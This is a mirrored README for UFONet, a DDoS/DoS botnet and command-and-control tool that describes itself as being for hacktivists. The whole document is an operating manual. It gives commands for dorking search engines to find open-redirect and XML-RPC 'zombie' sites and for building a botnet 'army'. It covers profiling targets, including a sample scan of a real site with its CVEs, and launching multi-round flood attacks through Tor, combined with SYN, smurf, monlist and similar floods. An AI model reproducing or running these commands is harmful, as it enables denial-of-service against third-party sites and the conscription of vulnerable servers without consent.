Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
epsylon
GitHub Repository: epsylon/ufonet
Path: blob/master/docs/README.txt
1208 views
1
===========================================================================
2
3
888 888 8888888888 .d88888b. 888b 888 888
4
888 888 888 d88PY888b 8888b 888 888
5
888 888 888 888 888 88888b 888 888
6
888 888 8888888 888 888 888Y88b 888 .d88b. 888888
7
888 888 888 888 888 888 Y88b888 d8P Y8b 888
8
888 888 888 888 888 888 Y88888 88888888 888
9
Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
10
'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
11
12
===========================================================================
13
14
Welcome to UFONet [ DDoS+DoS ] Botnet/C&C/Darknet ;-)
15
16
===========================================================================
17
18
###############################
19
# Project info
20
###############################
21
22
- Website:
23
24
https://ufonet.03c8.net
25
26
- IRC:
27
28
irc.freenode.net - #ufonet
29
30
###############################
31
# FAQ
32
###############################
33
34
https://ufonet.03c8.net/FAQ.html
35
36
###############################
37
# Summary
38
###############################
39
40
UFONet - Is a set of hacktivist tools that allow launching coordinated
41
DDoS and DoS attacks and combine both in a single offensive.
42
43
It also works as an encrypted DarkNET to publish and receive
44
content by creating a global client/server network based on
45
a direct-connect P2P architecture.
46
47
###############################
48
# Installing
49
###############################
50
51
UFONet runs on many platforms:
52
53
You can try to automatically get all required libraries using (as root):
54
55
python3 setup.py
56
57
For manual installation, run:
58
59
sudo apt-get install -y --no-install-recommends libpython3.11-dev python3-pycurl python3-geoip python3-whois python3-cryptography python3-requests libgeoip1 libgeoip-dev
60
python3 -m pip install --upgrade pip --no-warn-script-location --root-user-action=ignore
61
python3 -m pip install pycurl --upgrade --root-user-action=ignore
62
python3 -m pip install GeoIP python-geoip pygeoip requests whois scapy pycryptodomex duckduckgo-search --ignore-installed --root-user-action=ignore
63
64
###############################
65
# Searching for 'zombies'
66
###############################
67
68
UFONet can dig on different search engines results to find possible 'Open Redirect' vulnerable sites.
69
70
A common query string should be like this:
71
72
'page.php?url='
73
'check.cgi?url='
74
'checklink?uri='
75
'validator?uri='
76
77
For example, you can begin a search with:
78
79
./ufonet -s 'page.php?url='
80
81
Or providing a list of "dorks" from a file:
82
83
./ufonet --sd 'botnet/dorks.txt'
84
85
By default UFONet will use a search engine called 'DuckDuckGo'. But you can choose a different one:
86
87
./ufonet -s 'page.php?url=' --se 'bing'
88
89
You can also search massively using all search engines supported:
90
91
./ufonet -s 'page.php?url=' --sa
92
93
To control how many 'zombies' recieved from the search engines reports you can use:
94
95
./ufonet --sd 'botnet/dorks.txt' --sa --sn 20
96
97
Or you can make the tool to search for the maximun number of results automatically (this may take time!):
98
99
./ufonet --auto-search
100
101
At the end of the process, you will be asked if you want to check the list retrieved to see
102
if the urls are vulnerable.
103
104
Do you want to check if the NEW possible zombies are valid? (Y/n)
105
106
After that, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
107
108
Do you want to update your army? (Y/n)
109
110
If your answer is 'Y', your new 'zombies' will be appended to the file named: zombies.txt
111
112
-------------
113
Examples:
114
115
+ with verbose: ./ufonet -s 'page.php?url=' -v
116
+ with threads: ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100
117
118
###############################
119
# Testing botnet
120
###############################
121
122
UFONet can test if your 'zombies' are vulnerable and can be used for attacking tasks.
123
124
For example, open 'botnet/zombies.txt' (or another file) and create a list of possible 'zombies'.
125
Remember that urls of the 'zombies' should be like this:
126
127
http://target.com/check?uri=
128
129
After that, launch:
130
131
./ufonet -t 'botnet/zombies.txt'
132
133
You can test for XML-RPC Pingback vulnerability related 'zombies', with:
134
135
./ufonet --test-rpc
136
137
To check if your 'zombies' are still infected testing the whole botnet (this may take time!) try this:
138
139
./ufonet --test-all
140
141
And to check if your 'zombies' are still online run:
142
143
./ufonet --test-offline
144
145
Finally, you can order your 'zombies' to attack you and see how they reply to your needs using:
146
147
./ufonet --attack-me
148
149
At the end of the process, you will be asked if you want to check the list retrieved to see
150
if the urls are vulnerable.
151
152
Do you want to check if the NEW possible zombies are valid? (Y/n)
153
154
After that, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
155
156
Do you want to update your army? (Y/n)
157
158
If your answer is 'Y', the file: "botnet/zombies.txt" will be updated.
159
160
-------------
161
Examples:
162
163
+ with verbose: ./ufonet -t 'botnet/zombies.txt' -v
164
+ with proxy TOR: ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
165
+ with threads: ./ufonet -t 'botnet/zombies.txt' --threads 50
166
167
+ test whole botnet: ./ufonet --test-all
168
+ test XML-RPCs: ./ufonet --test-rpc
169
+ search for offlines: ./ufonet --test-offline
170
+ attack yourself: ./ufonet --attack-me
171
172
###############################
173
# Inspecting a target
174
###############################
175
176
UFONet can search for biggest file on your target by crawlering it:
177
178
./ufonet -i http://target.com
179
180
You can use this before to attack to be more effective.
181
182
./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
183
184
-------------
185
Example:
186
187
+input:
188
189
./ufonet -i http://target.com
190
191
+output:
192
193
[...]
194
195
+Image found: images/wizard.jpg
196
(Size: 63798 Bytes)
197
------------
198
+Style (.css) found: fonts.css
199
(Size: 20448 Bytes)
200
------------
201
+Webpage (.php) found: contact.php
202
(Size: 2483 Bytes)
203
------------
204
+Webpage (.php) found: about.php
205
(Size: 1945 Bytes)
206
------------
207
+Webpage (.php) found: license.php
208
(Size: 1996 Bytes)
209
------------
210
================================================================================
211
=Biggest File: http://target.com/images/wizard.jpg
212
================================================================================
213
-------------
214
215
###############################
216
# Abducting a target
217
###############################
218
219
UFONet can provide you some interesting information about your target:
220
221
./ufonet -x http://target.com
222
223
-------------
224
Example:
225
226
+input:
227
228
./ufonet -x https://yahoo.com
229
230
+output:
231
232
[...]
233
234
-Target URL: https://yahoo.com
235
-IP : 206.190.39.42
236
-IPv6 : OFF
237
-Port : 443
238
-Domain: yahoo.com
239
240
-Bytes in : 550.09 KB
241
-Load time: 9.10 seconds
242
243
-Banner: ATS
244
-Vía : http/1.1 usproxy3.fp.ne1.yahoo.com (ApacheTrafficServer),
245
http/1.1 media-router-fp25.prod.media.ir2.yahoo.com (ApacheTrafficServer [cMsSf ])
246
247
-WAF/IDS: FIREWALL NOT PRESENT (or not discovered yet)! ;-)
248
249
-Reports:
250
251
+ CVE-2017-7671 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7671
252
+ CVE-2017-5660 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5660
253
254
[...]
255
256
---------
257
[Info] Abduction finished... ;-)
258
259
-------------
260
261
###############################
262
# Attacking a target
263
###############################
264
265
UFONet can attack your target in many different ways.
266
267
For example, enter a target to attack with a number of rounds:
268
269
./ufonet -a http://target.com -r 10
270
271
On this example UFONet will attack the target a number of 10 times for each 'zombie'. That means that
272
if you have a list of 1.000 'zombies' it will launch 1.000 'zombies' x 10 rounds = 10.000 requests to the target.
273
274
If you don't put any round it will apply only 1 by default.
275
276
Additionally, you can choose a place to recharge on target's site. For example, a large image,
277
a big size file or a flash movie. In some scenarios where targets doesn't use cache systems
278
this will make the attack more effective.
279
280
./ufonet -a http://target.com -b "/images/big_size_image.jpg"
281
282
-------------
283
Examples:
284
285
+ with verbose: ./ufonet -a http://target.com -r 10 -v
286
+ with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
287
+ with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
288
+ with threads: ./ufonet -a http://target.com -r 10 --threads 500
289
290
###############################
291
# Special attacks
292
###############################
293
294
UFONet uses different ways to exploit 'Open Redirect' vulnerabilities.
295
296
You can use UFONet to stress database on target by requesting random valid strings as search queries:
297
298
./ufonet -a http://target.com --db "search.php?q="
299
300
Also, it exploits (by default) XML-RPC Pingback Vulnerability, generating callback requests and increasing
301
processing required by target.
302
303
You can test your list of 'XML-RPCs zombies' launching:
304
305
./ufonet --test-rpc
306
307
###############################
308
# Extra attacks
309
###############################
310
311
- LOIC: https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon
312
- LORIS: https://en.wikipedia.org/wiki/Slowloris_(software)
313
- UFOSYN: https://en.wikipedia.org/wiki/SYN_flood
314
- FRAGGLE: https://en.wikipedia.org/wiki/Fraggle_attack
315
- UFORST: https://ddos-guard.net/en/terminology/attack_type/rst-or-fin-flood
316
- SPRAY: https://en.wikipedia.org/wiki/DRDOS
317
- SMURF: https://en.wikipedia.org/wiki/Smurf_attack
318
- XMAS: https://en.wikipedia.org/wiki/Christmas_tree_packet
319
- DROPER: https://en.wikipedia.org/wiki/IP_fragmentation_attack
320
- SNIPER: https://www.imperva.com/learn/application-security/snmp-reflection/
321
- TACHYON: https://www.us-cert.gov/ncas/alerts/TA13-088A
322
- PINGER: https://www.cloudflare.com/learning/ddos/ping-icmp-flood-ddos-attack/
323
- MONLIST: https://www.us-cert.gov/ncas/alerts/TA14-013A
324
- UFOACK: https://www.f5.com/services/resources/glossary/push-and-ack-flood
325
- OVERLAP: https://cyberhoot.com/cybrary/fragment-overlap-attack/
326
- UFOUDP: https://en.wikipedia.org/wiki/UDP_flood_attack
327
- NUKE: https://dl.packetstormsecurity.net/papers/general/tcp-starvation.pdf
328
329
All ways could be combined, so UFONet can attack DDoS and DoS, at the same time.
330
331
###############################
332
# Updating
333
###############################
334
335
UFONet has implemented an option to update the tool to the latest stable version.
336
337
This feature can be used only if you have cloned it from a git respository.
338
339
To check your version you should launch:
340
341
./ufonet --update
342
343
This will update the tool automatically removing all files from old package.
344
345
###############################
346
# Generating a 'Blackhole'
347
###############################
348
349
UFONet has some P2P options to share/keep 'zombies' with other 'motherships'.
350
351
* Setup web server with a folder "ufonet", this folder should be:
352
353
- located in /var/www/ufonet (default debian/ubuntu install)
354
- owned by the user running the blackhole
355
- accessible with http://your-ip/ufonet/
356
357
* Start the blackhole with: ./ufonet --blackhole (or python2 blackhole.py)
358
359
* Anyone wanting to connect to your server needs to set the --up-to/--down-from
360
to the ip address of your webserver...
361
362
[!]WARNING : this *ADVANCED* function is *NOT* secure, proceed if you really want to.
363
364
To start a new 'blackhole' launch:
365
366
./ufonet --blackhole
367
368
###############################
369
# GUI/Web Interface
370
###############################
371
372
You can manage UFONet using a Web Interface. The tool has implemented a python web server
373
connected to the core providing you a more user friendly experience.
374
375
To launch it use:
376
377
./ufonet --gui
378
379
This will open a tab on your default browser with all features of the tool and some 'extra' options:
380
381
- SHIP.NEWS: Allows to read last "news" published by a "mothership"
382
- SHIP.MISSIONS: Allows to read last "missions" published by a "mothership"
383
- SHIP.STATS: Allows to review statistics from your "spaceship"
384
- SHIP.RANKING: Allows to check your "ranking" position
385
- SHIP.LINKS: Allows to review links published by a "mothership"
386
- SHIP.STREAMS: Allows to review streams (video/audio/live) published by a "mothership"
387
- SHIP.TV: Allows to play videos published by a "mothership"
388
- SHIP.GAMES: Allows to review games from your "spaceship"
389
- SHIP.BROWSER: Allows to navigate/surf the Internet from a sandbox
390
- SHIP.WARPS: Allows to interact with a "mothership" to download/upload "zombies"
391
- GLOBAL.BOARD: Allows to send/receive messages to/from a "mothership" (a forum)
392
- GLOBAL.GRID: Allows to review statistics from other "spaceships"
393
- GLOBAL.WARGAMES: Allows to propose and join some real "wargames"
394
- GLOBAL.RADAR: Allows to review locations published by other "motherships"
395
- GLOBAL.NEWS: Allows to read news related to UFONet
396
- [...]
397
398
###############################
399
# Timelog
400
###############################
401
402
--------------------------
403
25.08.2024 : v.1.9
404
--------------------------
405
406
--------------------------
407
02.03.2022 : v.1.8
408
--------------------------
409
410
--------------------------
411
14.07.2021 : v.1.7
412
--------------------------
413
414
--------------------------
415
17.08.2020 : v.1.6
416
--------------------------
417
418
--------------------------
419
08.06.2020 : v.1.5
420
--------------------------
421
422
--------------------------
423
01.02.2020 : v.1.4
424
--------------------------
425
426
--------------------------
427
10.03.2019 : v.1.3
428
--------------------------
429
430
--------------------------
431
03.02.2019 : v.1.2.1
432
--------------------------
433
434
--------------------------
435
31.12.2018 : v.1.2
436
--------------------------
437
438
--------------------------
439
26.09.2018 : v.1.1
440
--------------------------
441
442
--------------------------
443
08.03.2018 : v.1.0
444
--------------------------
445
446
--------------------------
447
14.07.2017 : v.0.9
448
--------------------------
449
450
--------------------------
451
21.10.2016 : v.0.8
452
--------------------------
453
454
--------------------------
455
17.08.2016 : v.0.7
456
--------------------------
457
458
--------------------------
459
05.11.2015 : v.0.6
460
--------------------------
461
462
--------------------------
463
24.05.2015 : v.0.5b
464
--------------------------
465
466
--------------------------
467
15.12.2014 : v.0.4b
468
--------------------------
469
470
--------------------------
471
27.09.2014 : v.0.3.1b
472
--------------------------
473
474
--------------------------
475
20.09.2014 : v.0.3b
476
--------------------------
477
478
--------------------------
479
22.06.2013 : v.0.2b
480
--------------------------
481
482
--------------------------
483
18.06.2013 : v.0.1b
484
--------------------------
485
486
###############################
487
# Thanks to
488
###############################
489
490
- BP<3
491
- UFo & Mandingo & Ikujam
492
- Phineas Fisher ;-)
493
- The Shadow Brokers (TSB) ;_)
494
- World Wide Antifas >-)
495
-------------------------
496
497
############
498
499